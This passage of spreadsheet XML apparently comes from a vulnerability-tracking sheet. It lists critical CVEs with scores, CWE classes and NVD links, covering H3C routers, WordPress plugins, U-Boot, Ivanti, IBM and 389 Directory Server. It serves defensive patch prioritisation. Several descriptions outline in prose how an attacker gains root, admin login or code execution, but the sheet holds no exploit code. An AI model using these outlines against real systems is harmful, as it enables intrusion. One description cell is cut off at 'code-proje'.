      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-29296</t>
        </is>
      </c>
      <c r="C108" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>H3C Magic BE18000 V200R007, H3C NX400 V100R015, H3C Magic NX30 Pro V100R0011, H3C Magic R3010 V100R009, H3C Magic NX15 V100R017, H3C Magic R1510 V100R016, H3C NE36 Pro V100R002 and H3C MC102G HM1A0V200R010 contain multiple command injection vulnerabilities in the /api/esps request handler. The affected object interfaces and methods are esps.dhcpd.vlan (getlist, delete), esps.filter.url (add, modify), esps.apcm.version (delete, H3C Magic NX15 only), esps.swcm.version (delete, upgrade, all affected models except H3C Magic NX15), and esps.system.ntp (set, all affected models except H3C Magic NX15). Attacker-controlled request parameters are incorporated into shell expressions executed by eval without adequate validation, allowing a remote attacker to execute arbitrary commands as root and gain complete control of the affected device.</t>
        </is>
      </c>
      <c r="M108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-29296</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63823</t>
        </is>
      </c>
      <c r="C109" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L109" s="5" t="inlineStr">
        <is>
          <t>My Safetipin Android Application 5.2.1 contains Hardcoded credentials in the authentication module, which allows remote attackers to bypass authentication and gain unauthorized access to user accounts via predictable OTP values.</t>
        </is>
      </c>
      <c r="M109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63823</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67066</t>
        </is>
      </c>
      <c r="C110" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in oasys sysoa version 1.0 allows a remote attacker to execute arbitrary code via the outtype parameter in the /outaddresspaging path</t>
        </is>
      </c>
      <c r="M110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67066</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70149</t>
        </is>
      </c>
      <c r="C111" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I111" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr">
        <is>
          <t>CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.</t>
        </is>
      </c>
      <c r="M111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70149</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70150</t>
        </is>
      </c>
      <c r="C112" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I112" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr">
        <is>
          <t>CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.</t>
        </is>
      </c>
      <c r="M112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70150</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70152</t>
        </is>
      </c>
      <c r="C113" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr">
        <is>
          <t>fabian:scholars_tracking_system</t>
        </is>
      </c>
      <c r="I113" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr">
        <is>
          <t>code-proje</t>
        </is>
      </c>
      <c r="M113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70152</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70290</t>
        </is>
      </c>
      <c r="C114" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability in the ZFS filesystem support can be triggered by malformed on-disk metadata. The issue may result in incorrect memory allocation followed by out-of-bounds memory access, potentially leading to a crash or arbitrary code execution during the boot process.</t>
        </is>
      </c>
      <c r="M114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70290</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70293</t>
        </is>
      </c>
      <c r="C115" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability exists in function ext4fs_get_bgdtable, the size calculation can lead to under allocation and this underallocated buffer will be used in memcpy() which could lead to arbitrary code execution, a denial of service, or other unspecified impacts.</t>
        </is>
      </c>
      <c r="M115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10196</t>
        </is>
      </c>
      <c r="C116" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr">
        <is>
          <t>The Mail Mint – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.31.0 via deserialization of untrusted input in the 'handle_form_submission' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code on the server. The vulnerability was partially patched in version 1.23.1.</t>
        </is>
      </c>
      <c r="M116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10196</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12744</t>
        </is>
      </c>
      <c r="C117" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12745</t>
        </is>
      </c>
      <c r="C118" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13447</t>
        </is>
      </c>
      <c r="C119" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G119" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr">
        <is>
          <t>The Mstore Api plugin for WordPress is vulnerable to Authentication Bypass via JWT Forgery in versions up to, and including, 4.20.0 This is due to missing cryptographic signature verification in the FirebasePhoneAuthHelper::verify_id_token() function, which decodes and validates Firebase ID token claims (alg, kid, aud, iss) but never calls openssl_verify() or any equivalent to validate the JWT signature against Google's actual public key certificates. This makes it possible for unauthenticated attackers to forge a Firebase Phone Auth JWT signed with a self-generated RSA key pair and impersonate any phone number, resulting in unauthorized access to existing WordPress accounts or creation of new arbitrary accounts.</t>
        </is>
      </c>
      <c r="M119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14559</t>
        </is>
      </c>
      <c r="C120" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not verify a user's password before authenticating them, allowing unauthenticated attackers to log in as any registered user, including administrators, by supplying only that user's email address.</t>
        </is>
      </c>
      <c r="M120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14559</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14563</t>
        </is>
      </c>
      <c r="C121" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not verify the password before issuing an authenticated session for a supplied email address in an unauthenticated action, allowing unauthenticated attackers to log in as any registered user, including administrators, or to create arbitrary new accounts.</t>
        </is>
      </c>
      <c r="M121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14563</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16310</t>
        </is>
      </c>
      <c r="C122" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr">
        <is>
          <t>The MemberDash plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.8.5 via the 'id' parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to change the password of any WordPress user, including administrators, by supplying an arbitrary user ID during registration, and take over their account without any notification sent to the victim.</t>
        </is>
      </c>
      <c r="M122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16310</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16504</t>
        </is>
      </c>
      <c r="C123" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1393, CWE-321</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr">
        <is>
          <t>Deployment of the VPS.org one-click Zulip template deploys a hardcoded application signing key, a default database password ("zulip"), and DISABLE_HTTPS=True.</t>
        </is>
      </c>
      <c r="M123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16504</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18221</t>
        </is>
      </c>
      <c r="C124" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G124" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H124" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I124" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to gain unauthorized access due to improper validation of client-supplied authentication parameters.</t>
        </is>
      </c>
      <c r="M124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18221</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18351</t>
        </is>
      </c>
      <c r="C125" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>The Drag and Drop File Upload for Elementor Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6.0 via the elementor_file_upload function. This is due to insufficient file type validation in the is_file_type_valid() function, which uses the attacker-controlled 'type' parameter as regex keys in the MIME allowlist, allowing blacklist bypass via a crafted extension that sanitize_file_name() later normalizes to a PHP extension. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible.</t>
        </is>
      </c>
      <c r="M125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18351</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18658</t>
        </is>
      </c>
      <c r="C126" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G126" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>IBM Operational Decision Manager 9.6.0.0, 9.5.0.0, 8.11.1.0, 8.11.0.1, 8.12.0.1, 9.5.0.1, and 9.0.0.1 is vulnerable to SQL injection. An unauthenticated attacker can execute arbitrary SQL statements and leverage database functionality to write a web shell to the application web root, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18658</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18749</t>
        </is>
      </c>
      <c r="C127" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E127" s="5" t="inlineStr"/>
      <c r="F127" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>The type=track branch authorises on _is_my_case(t_attach.case) only and never checks VinceTrackAttachment.shared. A coordinator-uploaded case artefact that has NOT been marked shared is still retrievable by any case member who has (or is sent) its uuid — leaks not-yet-released coordinator material to vendors on the case.</t>
        </is>
      </c>
      <c r="M127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18749</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18922</t>
        </is>
      </c>
      <c r="C128" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. During SASL PLAIN authentication, a stale identity carried in a Cyrus SASL auxiliary property from a prior failed bind attempt can be installed on a connection following a subsequent, unrelated successful bind, regardless of which SASL mechanism completes that second bind. An attacker can send a SASL PLAIN bind as cn=Directory Manager with an incorrect password, then complete a SASL ANONYMOUS bind on the same connection, causing the server to grant Directory Manager authority without any valid credentials. A variant using a valid low-privileged account's own successful bind instead of an anonymous one is also possible.</t>
        </is>
      </c>
      <c r="M128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18922</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19931</t>
        </is>
      </c>
      <c r="C129" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl makes it wrongly reuse an HTTP connection setup for a given
hostname using Negotiate authentication, when the initial request is done
using empty credentials. This can make user B's request get sent over user A's
previously authenticated connection.</t>
        </is>
      </c>
      <c r="M129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19931</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26035</t>
        </is>
      </c>
      <c r="C130" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G130" s="5" t="inlineStr">
        <is>
